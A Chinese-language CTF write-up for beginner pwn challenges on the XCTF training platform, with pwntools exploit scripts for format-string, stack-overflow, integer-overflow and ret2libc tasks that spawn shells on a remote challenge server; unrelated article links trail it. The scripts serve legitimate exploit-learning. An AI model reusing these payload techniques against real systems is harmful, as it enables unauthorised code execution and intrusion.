攻防世界pwn之新手区
涉及的工具有
Ubuntu 16.04
pwntools
IDA
gdb-peda
1、get_shell
连接就给flag,可以直接用nc连接,然后输入ls查看里面的目录,发现有名字叫flag文件,cat flag得到flag
64位的ELF 保护机制只有NX
然后用IDA看看,找到main函数,查看伪代码
system函数可以直接获得shell ,连接就可以获得get shell
from pwn import *
r=remote('111.198.29.45',51214)
r.interactive()
2、CGfsb
先看看文件位数和保护机制
这里利用的是格式化字符串漏洞,当printf后面带的是%n,那么它会把前面的字符串的长度输入到内存中,只需要让n前面有八个字符,就可以让s等于8,pwnme=s=8,就可以cat flag
寻找一下输入的参数在printf函数中的位置,通过不断打印%x泄露内存的地址,发现61616161在第10位,61是a的ascll码
那么可以构造exp
804a068是pwnme的地址,‘aaaa’和n前面的字符凑成8个字符 ,$是偏移量,意味着偏移了10
rom pwn import *
r=remote('111.198.29.45',46202) r.recvuntil("please tell me your name:")
r.sendline('name') payload=p32(0x804a068)+'aaaa'+'%10$n'
r.sendline(payload) r.interactive()
执行结果
3、when_did_you_born
检查保护机制
然后拖到IDA
要使v5输入1926才能cat flag 但是一输入1926就退出程序了,gets函数可以溢出,我们就可以在输入的名字(v4)的时候填充无意义字符使其溢出,把v5原本的值覆盖掉,替换成1926
在IDA双击&4(var_20)和&5(var_18) 发现它们相差0x8个字符。
当v4输入的长度大于0x8个字符,大于8个的数会覆盖掉v5,使v5重新赋值
那么可以构造脚本
from pwn import *
r=remote('111.198.29.45',51232) r.recvuntil("What's Your Birth?")
r.sendline('') #随便填 r.recvuntil("What's Your Name?")
payload='a'*0x8+p32(0x786) #0x786的十进制是1926
r.sendline(payload)
r.interactive()
执行,获取flag
4、hello_pwn
64位的ELF
打开了NX保护
丢到IDA看看,只需要让dword_601068等于1853186401就可以执行sub_400686函数获取flag
read存在溢出,且unk_691968和dword_60106c偏移量为4,那么很轻松就可以覆盖dword_60106c的值
编写脚本
from pwn import *
#p=process('./hello_pwn')
p=remote('111.198.29.45',31449)
payload = 'a'*0x4+p64(1853186401)
p.recvuntil("bof")
p.sendline(payload)
p.interactive()
执行
5、level0
程序是64位
NX保护
看看伪代码先
返回vulnerable_function函数,read函数存在溢出
看看其他函数,_system函数可以执行系统命令
shift+F12看看字符串,发现有shell
思路很明确,让read函数溢出然后执行system函数,并让system函数的参数为/bin/sh, 我们就可以get到shell了
但是这是一个64位的程序,与32位不同,无法直接传参进去,64位的程序会先把参数先存入寄存器中,前六个参数按顺序存储在寄存器rdi, rsi, rdx, rcx, r8, r9,所以我们需要找到rdi的地址
然后再找到‘/bin/sh’的地址
以及system的地址
脚本如下
from pwn import *
r=remote('111.198.29.45',47491)
rdi_add=0x400663
shell_add=0x400684
sys_add=0x400460 payload='a'*0x88+p64(rdi_add)+p64(shell_add)+p64(sys_add)
r.sendline(payload)
r.interactive()
--------------------------分割线------------------------------------
后面承认我瞎,没有看到callsystem函数可以直接调用shell
重新写脚本
from pwn import *
r=remote('111.198.29.45',47491)
payload='a'*0x88+p64(0x400596)
r.sendline(payload)
r.interactive()
结果如上,不再演示
6、level2
32位的ELF 只有NX保护
丢到IDA看看,引用vulnerable_funcion函数
system可以执行
shift+F12同样看到了shell
思路跟上一题差不多,直接read溢出,利用system函数传参来get shell
脚本如下
from pwn import *
r=remote('111.198.29.45',45695)
sys_add=0x8048320
shell_add=0x804a024
payload='a'*(0x88+0x4)+p32(sys_add)+'aaaa'+p32(shell_add) #aaaa是无效的返回地址
r.sendline(payload)
r.interactive()
执行结果
8、guess_num
检查文件
用IDA打开看看
需要连续猜中10次才能得到flag,但是上面函数有gets这个危险的函数
v9经过0x20个字符就溢出到seed,那么如果把seed[0]变成我们可控的数字,就可以使v6和v8相等,得到flag
借鉴大佬的exp
from pwn import *
from ctypes import * #python标准库中自带的ctypes模块进行python和c的混合编程 r=remote('111.198.29.45',34125)
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload='a'*0x20+p64(1)
r.recvuntil("\n")
r.sendline(payload)
libc.srand(1)
for i in range(10):
num=str(libc.rand()%6+1)
r.recvuntil('\n')
r.sendline(num) r.interactive()
libc的共享库可以用ldd调用
执行结果
9、int_overflow
详细解题思路链接
https://bbs.pediy.com/thread-254851.htm
先把流程走一遍
选1可以输入名字和密码(密码要3到8位)否则判定无效数字,选2直接退出,然后我们看看判断的函数
v3是一个无符号类型的数字,意味着范围只能到0-255,如果输入256,那么他会输出0,这里存在整数溢出,无论是3~8还是259~264都是可以通过验证的,那么就可以通过strcpy的栈溢出覆盖what_is_this的返回地址,来获得flag
exp如下
from pwn import *
r=remote('111.198.29.45',50332)
e=ELF("./int_overflow")
what_is_this_addr=e.symbols['what_is_this'] r.recvuntil('Your choice:')
r.sendline('')
r.recvuntil('Please input your username:')
r.sendline('aaa')
r.recvuntil('Please input your passwd:') payload='a'*(0x14+0x4)+p32(what_is_this_addr)
payload=payload.ljust(262,'a') r.sendline(payload)
r.interactive()
执行结果
10、cgpwn2
先检查发现是一个32位的程序,只有NX保护
用IDA打开
上面那一大串没什么用,但是有fgets函数和gets,同时name在bss段中,是全局变量
思路就是 用fgets输入“/bin/sh“,返回地址覆盖成system的地址,再把传参(/bin/sh)到system里面即可get shell了
from pwn import * r=remote('111.198.29.45',31947)
name_addr=0x804A080 #bss段中name的地址
e=ELF("./cgpwn2")
sys_addr=e.symbols["system"] #获取system的地址 r.recvuntil("\n")
r.sendline("/bin/sh") payload='a'*(0x26+0x4)+p32(sys_addr)+p32(0xaaaa)+p32(name_addr) #0xaaaa是system的返回地址,随便填
r.recvuntil("\n")
r.sendline(payload)
r.interactive()
执行结果
11 level3
ret2libc
因为之前做过,故不在演示
https://www.cnblogs.com/gaonuoqi/p/11684294.html
思路:通过read函数的栈溢出返回到write函数泄露出write本身或者read的地址,虽然libc里面的地址是随机的,但是函数的相对位置是固定的,知道了read或wirte的真实地址就可以通过偏移量找到libc里面的system和/bin/sh,之后再次返回到vulnerable_funciton进行二次read的栈溢出,返回地址是system,并传入参数/bin/sh构造system(/bin/sh)
exp如下
from pwn import *
r=remote('111.198.29.45',33181) e=ELF('./level3')
write_got=e.got['write']
write_plt=e.plt['write']
func_addr=e.symbols['vulnerable_function'] payload='a'*(0x88+0x4)+p32(write_plt)+p32(func_addr)+p32(0x1)+p32(write_got)+p32(0x4)
r.recvuntil('Input:\n')
r.sendline(payload) write_addr=u32(r.recv(4)) libc=ELF('./libc_32.so.6')
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
bin_libc=libc.search('/bin/sh').next() offset=write_addr-write_libc
sys_addr=offset+sys_libc
bin_addr=offset+bin_libc payload2='a'*(0x88+0x4)+p32(sys_addr)+p32(func_addr)+p32(bin_addr)
r.recvuntil('Input:\n')
r.sendline(payload2) r.interactive()
执行结果
攻防世界pwn之新手区的更多相关文章
- 【pwn】攻防世界 pwn新手区wp
[pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...
- 攻防世界-WEB-新手练习区
附:|>>>攻防世界-WEB-高手进阶区<<<|
- 攻防世界PWN简单题 level0
攻防世界PWN简单题 level0 开始考验栈溢出的相关知识了 Checksec 一下文件 看看都开了什么保护 和 是多少位的程序 发现是64位的程序, 扔进IDA64.IDA YYDS.. 进入主函 ...
- 攻防世界PWN简单题 level2
攻防世界PWN简单题 level2 此题考验的是对ROP链攻击的基础 万事开头PWN第一步checksec 一下 32位的小端程序,扔进IDA 进入函数,找出栈溢出漏洞. 又是这个位置的栈溢出,rea ...
- 攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup
攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup 题目介绍 题目考点 PHP代码审计 git源码泄露 Writeup 进入题目,点击一番,发现可能出现git ...
- 攻防世界 WEB 高手进阶区 TokyoWesterns CTF shrine Writeup
攻防世界 WEB 高手进阶区 TokyoWesterns CTF shrine Writeup 题目介绍 题目考点 模板注入 Writeup 进入题目 import flask import os a ...
- 攻防世界 WEB 高手进阶区 easytornado Writeup
攻防世界 WEB 高手进阶区 easytornado Writeup 题目介绍 题目考点 Python模板 tornado 模板注入 Writeup 进入题目, 目录遍历得到 /flag.txt /w ...
- 攻防世界 WEB 高手进阶区 XCTF Web_python_template_injection Writeup
攻防世界 WEB 高手进阶区 XCTF Web_python_template_injection Writeup 题目介绍 题目考点 SSTI模板注入漏洞 Writeup 知识补充 模板注入:模板引 ...
- 攻防世界 WEB 高手进阶区 XCTF Web_php_unserialize Writeup
攻防世界 WEB 高手进阶区 XCTF Web_php_unserialize Writeup 题目介绍 题名考点 PHP反序列化漏洞 正则匹配 Writeup <?php class Demo ...
随机推荐
- RabbitMQ学习笔记(三、生产者与消费者)
目录: 细说交换器 细说队列 发送消息 消费消息 确认与拒绝 细说交换器: 1.方法: public AMQP.Exchange.DeclareOk exchangeDeclare(String ex ...
- VIJOS-P1167 南蛮图腾
洛谷 P1498 南蛮图腾 洛谷传送门 JDOJ 1325: VIJOS-P1167 南蛮图腾 JDOJ传送门 Description 自从到了南蛮之地,孔明不仅把孟获收拾的服服帖帖,而且还发现了不少 ...
- CSP 2019 游记
Day -32 开坑. 没什么好说的,等个 5 天等初赛(应该叫第一轮认证)挂掉之后就能弃坑了. 今天开始停课,虽然每天只停半天,但是感觉还是特别的舒服~ 然而得等初赛过了才能全天停课-- 没关系,熬 ...
- __module__和__class__
目录 一.__module__ 二.__class__ # lib/aa.py class C: def __init__(self): self.name = 'SB' # index.py fro ...
- ASP.NET Core 中基于 API Key 对私有 Web API 进行保护
这两天遇到一个应用场景,需要对内网调用的部分 web api 进行安全保护,只允许请求头账户包含指定 key 的客户端进行调用.在网上找到一篇英文博文 ASP.NET Core - Protect y ...
- css top,right,bottom,left设置为0有什么用?它和width:100%和height:100%有什么区别?
壹 ❀ 引 当我们使用position属性时,总免不了与top,left,right,bottom四个属性打交道,那么这四个属性都设置为0时有什么用,与宽高设置100%又有什么区别?本文对此展开讨论 ...
- RMAN详细教程(四):备份脚本实战操作
RMAN详细教程(一):基本命令代码 RMAN详细教程(二):备份.检查.维护.恢复 RMAN详细教程(三):备份脚本的组件和注释 RMAN详细教程(四):备份脚本实战操作 1.为了安全起见,先将数据 ...
- springboot mail整合freemark实现动态生成模板
目标:1:springboot 整合 mail2: mail 使用freemark 实现模板动态生成(就是通过字符串生成模板,不需要在工程中写入固定模板)3: springboot 整合aop 实现日 ...
- Java多线程并发面试问答
Java并发面试问答 什么是原子操作?Java并发API中的原子类是什么? 原子操作在单个任务单元中执行,而不受其他操作的干扰.在多线程环境中,原子操作是必需的,以避免数据不一致. int++不是原子 ...
- Leetcode练习题Search Insert Position
Question: Given a sorted array and a target value, return the index if the target is found. If not, ...